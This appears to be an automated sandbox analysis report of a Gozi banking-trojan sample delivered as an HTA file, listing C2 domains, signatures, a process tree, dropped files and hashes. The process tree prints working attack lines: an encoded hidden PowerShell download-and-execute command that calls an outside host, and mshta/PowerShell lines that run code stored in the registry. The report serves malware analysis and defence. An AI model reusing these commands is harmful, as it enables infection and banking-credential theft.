Analysis

  • max time kernel
    155s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 13:16

General

  • Target

    client_5.hta

  • Size

    22KB

  • MD5

    988f8a03ac893e41d4f9aaca5addafe1

  • SHA1

    d3bda7e7be11da19cd3adf16a4c58548eb573f74

  • SHA256

    0389108b0322ecbbadd21a245c1b75f93e38a2e51a8b38a385596ebe05c323cf

  • SHA512

    2dd80008e91d35da4d60572be008ab60ae7edd5ebe5b94518c3bfb3aa573c812e2abeb3c7d4033ca9cf5b99e64db5537c79b3e6aae8bd89e894de7fcc2a5b1c1

  • SSDEEP

    384:pA7lUDQMeK43MV0p6WUuJOJjmF9Koq5nZN851z9fwP3jXMeSnqIc6l:H2MWqwRwPDd6l

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3700
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:5064
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4020
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3172
        • C:\Windows\SysWOW64\mshta.exe
          C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3944
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3236
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1724
              • C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
                "C:\Users\Admin\AppData\Local\Temp\DLWwX.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:3928
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 472
                  6⤵
                  • Program crash
                  PID:4680
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lc87='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lc87).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:5040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gqphorlf -value gp; new-alias -name astvxebgbw -value iex; astvxebgbw ([System.Text.Encoding]::ASCII.GetString((gqphorlf "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4184
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:324
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7191.tmp" "c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\CSC88A40D9E46C24281AA4C2E160ACF426.TMP"
                5⤵
                  PID:852
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2552
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7376.tmp" "c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\CSC109200EA473048668B3B728964BFCD92.TMP"
                  5⤵
                    PID:4472
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\DLWwX.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2184
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:4144
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:412
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3928 -ip 3928
              1⤵
                PID:2284

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                16KB

                MD5

                58696e0d27fbcd9dcc44f25bae771916

                SHA1

                0a9e3cca536b284b63f45d3baaa1e65ae88aa9a4

                SHA256

                c005d32ca3255d93c7c65fb2de9bb3b7fd1247497036edfaeada1ee9dc189d98

                SHA512

                15369e12982a3403ce080e1b6e10a67ea1405e063045bf038f85273103466c2b48b639c0409a8eb9de0041d912c89b2a32ff837bd376f12ef96651234eff305b

              • C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
                Filesize

                292KB

                MD5

                f63d00d962c43095a6de3838401e5b59

                SHA1

                c49feab758326a965d30fef2807291cf39c0d61a

                SHA256

                713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

                SHA512

                12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

              • C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
                Filesize

                292KB

                MD5

                f63d00d962c43095a6de3838401e5b59

                SHA1

                c49feab758326a965d30fef2807291cf39c0d61a

                SHA256

                713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

                SHA512

                12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

              • C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
                Filesize

                292KB

                MD5

                f63d00d962c43095a6de3838401e5b59

                SHA1

                c49feab758326a965d30fef2807291cf39c0d61a

                SHA256

                713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

                SHA512

                12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

              • C:\Users\Admin\AppData\Local\Temp\RES7191.tmp
                Filesize

                1KB

                MD5

                86c9bdab113a015f1e8cce0cd36cba61

                SHA1

                9eb6aa59965f066dfc755b09c26fe17f738145e1

                SHA256

                ce481fc23fb33868af4da9fcddcd7904aa24cf4bd1bc9f2dcb8ac0bac887610a

                SHA512

                c2f5af4d87652afeccd720f4c315b324c3ff6052778f44154dbd56ad9f4d5f417a87c23929c3d81e5396d5f38b361aaf4c441ae17cdea271c1342d6c1edcbf1d

              • C:\Users\Admin\AppData\Local\Temp\RES7376.tmp
                Filesize

                1KB

                MD5

                62ab33bd591b1a7b9bfed1cc1d25d70b

                SHA1

                3a8d4a1016a9172ef78cd22b4ef92080b0caa21f

                SHA256

                f322d994a54f2d3fbaf4d9f5fbc91bb23ec82e9e6194b18024b5459c30419d60

                SHA512

                79f95108db05191cd1a5088f32fd07586e139660a6efa0f3d65e8177ba41b0a21a7480d0cc07b419cca4977e71b141b17b79abb5c17d3a85b6705957b10feabb

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5sl1nwcj.0yi.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.dll
                Filesize

                3KB

                MD5

                c41441c7aa72cf5b0aee56941e05e55f

                SHA1

                c54b4a4086280c2fc228f3004aef5fcdde8dbc0d

                SHA256

                0f8087f9eecf37b90c75d8e239ce478d280099345dd9725b426a2105edfac5c7

                SHA512

                bc2aa584b62c7012ef5b421e98302b3894e62962668d6170eeb49de1ca896cb8585f578c969a8caed21131505e119d52dd69e38177b034d47e5edf00616ec606

              • C:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.dll
                Filesize

                3KB

                MD5

                e7613f89dbf45fd25dfa006187e15d11

                SHA1

                026b8b822c5002100e0b320c61d904cd6ff3abe0

                SHA256

                d326af78a9cf3dbfa11015391a88558cc73a2bc00621247d15d6a8c15c5377e7

                SHA512

                6ba4842cc3734956c396e954c93c0ddc494d7ed85cc5f20abd6a039147e4c7f2bfd80bbb544ebbb5c8ac6f9a9ee1b55cee28f8d37c9446d4039dcb90e7cc8326

              • \??\c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\CSC88A40D9E46C24281AA4C2E160ACF426.TMP
                Filesize

                652B

                MD5

                8bcf7523d70f79fc2d1ff370b98f93b9

                SHA1

                076c08b9fd4eb056f88ed18ad6a1406813036848

                SHA256

                71878dd64004b3199c3b9ccff5a87bd6267955a0c04abf9f1a8d8453da11eb62

                SHA512

                151eec2e6fb8642eed1fb70db079326285790a4abcec656ce4fe464165f13b9177ec69b8dd46f587289063ffd87371f6ab57b5d626a5e95ae0172d2acc511462

              • \??\c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              • \??\c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.cmdline
                Filesize

                369B

                MD5

                e375a59f6cbf2287a28c054efe6dd738

                SHA1

                ab4ae7f113a266486c401326b24b04e1352112d6

                SHA256

                3adf1ce3fba171de92b32c074f76e16610c8d5027f33554aaeb78b0e947def5a

                SHA512

                08096e6ddb6feb9a8985d8f72855938e6de6b9fac853d95f812d193b94364daad2d874ff3eb00df98878a6cf36ca0a9cd9585ed0f16669bd303f97dfed8246d4

              • \??\c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\CSC109200EA473048668B3B728964BFCD92.TMP
                Filesize

                652B

                MD5

                52392dd4c9bb8eeed1f3a0fffe2dc9dc

                SHA1

                9a1f09f8ef02ec3ef9b3dee39c6ea8a779a66b5f

                SHA256

                21370747db5ea4269ba39a0bcc22893844715175f234f27d31eceee16c1936cb

                SHA512

                a6adb84971fc4962348c6ae4132d4b57d49e3d2626a45cb9db36ce1f8100b230cf19620105fc2cb42b85992418ffda3d9de23d3206a3e6af969c85c59c4b034d

              • \??\c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              • \??\c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.cmdline
                Filesize

                369B

                MD5

                345a670bb296ecdbcffa8a35809cd9d8

                SHA1

                00517c91c6a481ef6054673f217555b65db9567d

                SHA256

                f94bd87685babad411150a1d27a1b2e700ac380aa0dc15bd701db0e6ac72560e

                SHA512

                097d8db2064a740d3b8e27f24e75efb84d39067fb47cdcc4ad5a75fd68a7d4038781f9806e933977b84654efd6459819c877671197c47d314d4dcb5e38e35da6

              • memory/412-135-0x000001E1BE440000-0x000001E1BE4E4000-memory.dmp
                Filesize

                656KB

              • memory/412-137-0x000001E1BDF90000-0x000001E1BDF91000-memory.dmp
                Filesize

                4KB

              • memory/412-160-0x000001E1BE440000-0x000001E1BE4E4000-memory.dmp
                Filesize

                656KB

              • memory/1724-27-0x0000000007630000-0x0000000007652000-memory.dmp
                Filesize

                136KB

              • memory/1724-5-0x0000000005910000-0x0000000005976000-memory.dmp
                Filesize

                408KB

              • memory/1724-0-0x0000000071CD0000-0x0000000072480000-memory.dmp
                Filesize

                7.7MB

              • memory/1724-26-0x00000000076D0000-0x0000000007766000-memory.dmp
                Filesize

                600KB

              • memory/1724-24-0x0000000002810000-0x0000000002820000-memory.dmp
                Filesize

                64KB

              • memory/1724-41-0x0000000071CD0000-0x0000000072480000-memory.dmp
                Filesize

                7.7MB

              • memory/1724-2-0x00000000027C0000-0x00000000027F6000-memory.dmp
                Filesize

                216KB

              • memory/1724-3-0x00000000052E0000-0x0000000005908000-memory.dmp
                Filesize

                6.2MB

              • memory/1724-4-0x0000000005280000-0x00000000052A2000-memory.dmp
                Filesize

                136KB

              • memory/1724-20-0x0000000002810000-0x0000000002820000-memory.dmp
                Filesize

                64KB

              • memory/1724-6-0x00000000059F0000-0x0000000005A56000-memory.dmp
                Filesize

                408KB

              • memory/1724-12-0x0000000005AA0000-0x0000000005DF4000-memory.dmp
                Filesize

                3.3MB

              • memory/1724-17-0x0000000006200000-0x000000000621E000-memory.dmp
                Filesize

                120KB

              • memory/1724-1-0x0000000002810000-0x0000000002820000-memory.dmp
                Filesize

                64KB

              • memory/1724-23-0x0000000006640000-0x000000000665A000-memory.dmp
                Filesize

                104KB

              • memory/1724-28-0x00000000084E0000-0x0000000008A84000-memory.dmp
                Filesize

                5.6MB

              • memory/1724-18-0x0000000006570000-0x00000000065BC000-memory.dmp
                Filesize

                304KB

              • memory/1724-19-0x0000000071CD0000-0x0000000072480000-memory.dmp
                Filesize

                7.7MB

              • memory/1724-22-0x00000000078B0000-0x0000000007F2A000-memory.dmp
                Filesize

                6.5MB

              • memory/1724-21-0x0000000002810000-0x0000000002820000-memory.dmp
                Filesize

                64KB

              • memory/2184-146-0x0000018012640000-0x0000018012641000-memory.dmp
                Filesize

                4KB

              • memory/2184-159-0x0000018012870000-0x0000018012914000-memory.dmp
                Filesize

                656KB

              • memory/2184-142-0x0000018012870000-0x0000018012914000-memory.dmp
                Filesize

                656KB

              • memory/3172-144-0x00000000092B0000-0x0000000009354000-memory.dmp
                Filesize

                656KB

              • memory/3172-99-0x0000000002FA0000-0x0000000002FA1000-memory.dmp
                Filesize

                4KB

              • memory/3172-98-0x00000000092B0000-0x0000000009354000-memory.dmp
                Filesize

                656KB

              • memory/3700-113-0x0000026182DE0000-0x0000026182DE1000-memory.dmp
                Filesize

                4KB

              • memory/3700-112-0x0000026183260000-0x0000026183304000-memory.dmp
                Filesize

                656KB

              • memory/3700-150-0x0000026183260000-0x0000026183304000-memory.dmp
                Filesize

                656KB

              • memory/3764-157-0x000001FF0D1E0000-0x000001FF0D284000-memory.dmp
                Filesize

                656KB

              • memory/3764-124-0x000001FF0D1E0000-0x000001FF0D284000-memory.dmp
                Filesize

                656KB

              • memory/3764-126-0x000001FF0D290000-0x000001FF0D291000-memory.dmp
                Filesize

                4KB

              • memory/3928-51-0x00000000023E0000-0x00000000023EB000-memory.dmp
                Filesize

                44KB

              • memory/3928-50-0x0000000002530000-0x0000000002630000-memory.dmp
                Filesize

                1024KB

              • memory/3928-49-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

              • memory/3928-46-0x0000000002450000-0x000000000245D000-memory.dmp
                Filesize

                52KB

              • memory/3928-45-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

              • memory/3928-44-0x00000000023E0000-0x00000000023EB000-memory.dmp
                Filesize

                44KB

              • memory/3928-43-0x0000000002530000-0x0000000002630000-memory.dmp
                Filesize

                1024KB

              • memory/4020-155-0x00000290EB610000-0x00000290EB6B4000-memory.dmp
                Filesize

                656KB

              • memory/4020-117-0x00000290EB610000-0x00000290EB6B4000-memory.dmp
                Filesize

                656KB

              • memory/4020-118-0x00000290EB5D0000-0x00000290EB5D1000-memory.dmp
                Filesize

                4KB

              • memory/4144-152-0x0000000001230000-0x0000000001231000-memory.dmp
                Filesize

                4KB

              • memory/4144-149-0x0000000001640000-0x00000000016D8000-memory.dmp
                Filesize

                608KB

              • memory/4144-154-0x0000000001640000-0x00000000016D8000-memory.dmp
                Filesize

                608KB

              • memory/4184-64-0x00007FFF2A700000-0x00007FFF2B1C1000-memory.dmp
                Filesize

                10.8MB

              • memory/4184-109-0x00007FFF2A700000-0x00007FFF2B1C1000-memory.dmp
                Filesize

                10.8MB

              • memory/4184-110-0x000002277E490000-0x000002277E4CD000-memory.dmp
                Filesize

                244KB

              • memory/4184-96-0x000002277E490000-0x000002277E4CD000-memory.dmp
                Filesize

                244KB

              • memory/4184-94-0x000002277E480000-0x000002277E488000-memory.dmp
                Filesize

                32KB

              • memory/4184-80-0x000002277E320000-0x000002277E328000-memory.dmp
                Filesize

                32KB

              • memory/4184-66-0x000002277DC10000-0x000002277DC20000-memory.dmp
                Filesize

                64KB

              • memory/4184-65-0x000002277DC10000-0x000002277DC20000-memory.dmp
                Filesize

                64KB

              • memory/4184-53-0x000002277DC60000-0x000002277DC82000-memory.dmp
                Filesize

                136KB

              • memory/5064-130-0x000001E1A2170000-0x000001E1A2171000-memory.dmp
                Filesize

                4KB

              • memory/5064-125-0x000001E1A28D0000-0x000001E1A2974000-memory.dmp
                Filesize

                656KB

              • memory/5064-158-0x000001E1A28D0000-0x000001E1A2974000-memory.dmp
                Filesize

                656KB